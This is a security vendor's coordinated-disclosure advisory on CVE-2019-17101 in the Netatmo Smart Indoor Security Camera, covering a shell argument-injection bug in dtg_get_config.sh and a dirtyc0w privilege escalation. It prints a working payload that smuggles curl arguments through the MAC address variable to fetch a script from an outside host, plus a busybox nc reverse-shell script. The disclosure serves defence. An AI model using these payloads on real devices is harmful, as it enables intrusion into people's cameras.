3 min read

Cracking the Netatmo Smart Indoor Security Camera

Bogdan BOTEZATU

April 23, 2020

Ad One product to protect all your devices, without slowing them down.
Free 90-day trial
Cracking the Netatmo Smart Indoor Security Camera

CVE-2019-17101 – Command execution due to unsanitized input

Indoor video surveillance has become one of the most frequent applications for IoT devices. In public places, offices or private homes, video surveillance helps deter crime and detect accidents before they become uncontainable. Security cameras have become a necessity but, in the IoT world, any new gadget added to a network can turn into a liability.

This article – part of a series developed in partnership with PCMag – aims to shed light on the security of the world’s best-sellers in the IoT space. PCMag contacted the research team at Bitdefender and asked us to look at several popular devices, including the Netatmo Smart Indoor Security Camera. More information is available in this article published on our partner’s website.

Vulnerabilities at a glance

The Bitdefender IoT Vulnerability Research Team discovered that the device is susceptible to an authenticated file write that leads to command execution (CVE-2019-17101), as well as to a privilege escalation via dirtyc0w – a local privilege escalation bug that exploits a race condition in the implementation of the copy-on-write mechanism in the kernel’s memory-management subsystem.

These might not be the droids you’re looking for

While our past research showed real-life examples where attackers could remotely hijack devices and control them from afar, this report is a tad different – the vulnerabilities outlined here may help a legitimate user or a third party in possession of the correct credentials to jailbreak the device and completely own it. And, while we’ll let you imagine a valid real-world scenario in which you’d pwn your own device, we’d also like to remind keen visitors to our blog that the ability to jailbreak is still a vulnerability and should be regarded as such.

Disclosure timeline

Dec 20, 2019: Bitdefender informs the vendor about the vulnerability
Dec 23, 2019: Vulnerability acknowledged on the vendor’s side  
Jan 14, 2020: Vulnerability is fixed, patch expected to deploy on Jan 20  
Jan 17, 2020: Patch is adopted among affected customers
Apr 23, 2020: Coordinated vulnerability disclosure

Authenticated file write leading to command execution

The webserver running on the camera is vulnerable to a file write that can be leveraged to obtain command execution with the privileges of the running server. To access this functionality, an attacker needs to know the secret path to the camera (for local attacks), or to obtain access to the user account (through credential stuffing, phishing etc.)  to send commands using the VPN connection.

The vulnerability occurs in the dtg_get_config.sh script due to improper handling of a user-controlled variable.

Vulnerable line:

evt_config_json=`curl -X GET
http://127.0.0.1:8083/configs/home/modules/id=$mac_address`

An attacker can use the shell’s expansion and word splitting functionality to give arbitrary arguments to the curl command through the $mac_address variable.

Example payload:

mac_address={,-o,/dev/null,192.168.50.131/rev.sh,-o,/system/www/secret/live/ping.sh}

Using this payload, the executed command will be:

 curl -X GET http://127.0.0.1:8083/configs/home/modules/id= -o
 /dev/null 192.168.50.131/rev.sh -o /system/www/secret/live/ping.sh

curl will first download the initial file into /dev/null, then download a second file from a location that we control (192.168.50.131/rev.sh in this case), writing it as /system/www/secret/live/ping.sh

To execute the malicious script, a request has to be made to /b3f2f2101057f1f956776c1431113a01/live/ping.sh

Example shell script for reverse shell:

#!/system/bin/sh
busyboxnc 192.168.50.131 4446 -e /bin/sh

This script will run with the privileges of the webserver, uid 1000 and gid 3003.

Note: there are multiple accessible scripts which don’t quote input variables, which are then interpreted by sh.

Privilege escalation

The device is susceptible to privilege escalation (an attacker can get root access) via the dirtyc0w exploit.

This vulnerability was discovered independently by both Bitdefender and Netatmo security and fixed. According to Netatmo, all indoor camera models have been updated to plug the dirtyc0w exploit since the end of February 2020.

tags


Author



Right now

Top posts

Vulnerabilities Identified in Wyze Cam IoT Device

Vulnerabilities Identified in Wyze Cam IoT Device

March 29, 2022

1 min read
New FluBot and TeaBot Global Malware Campaigns Discovered

New FluBot and TeaBot Global Malware Campaigns Discovered

January 26, 2022

10 min read
Bitdefender Honeypots Signal Active Log4Shell 0-Day Attacks Underway; Patch Immediately

Bitdefender Honeypots Signal Active Log4Shell 0-Day Attacks Underway; Patch Immediately

December 10, 2021

2 min read
Bitdefender, Law Enforcement Partnership Saves REvil Victims Half a Billion in Ransom Demand

Bitdefender, Law Enforcement Partnership Saves REvil Victims Half a Billion in Ransom Demand

November 08, 2021

2 min read
Bitdefender Offers Free Universal Decryptor for REvil/Sodinokibi Ransomware

Bitdefender Offers Free Universal Decryptor for REvil/Sodinokibi Ransomware

September 16, 2021

2 min read
LuminousMoth – PlugX, File Exfiltration and Persistence Revisited

LuminousMoth – PlugX, File Exfiltration and Persistence Revisited

July 21, 2021

9 min read

FOLLOW US ON

SOCIAL MEDIA


You might also like

New FluBot and TeaBot Global Malware Campaigns Discovered New FluBot and TeaBot Global Malware Campaigns Discovered
Bitdefender

January 26, 2022

10 min read
Poking Holes in Crypto-Wallets: A Short Analysis of BHUNT Stealer Poking Holes in Crypto-Wallets: A Short Analysis of BHUNT Stealer
Bitdefender

January 19, 2022

2 min read
Bitdefender, Law Enforcement Partnership Saves REvil Victims Half a Billion in Ransom Demand Bitdefender, Law Enforcement Partnership Saves REvil Victims Half a Billion in Ransom Demand
Bogdan BOTEZATU

November 08, 2021

2 min read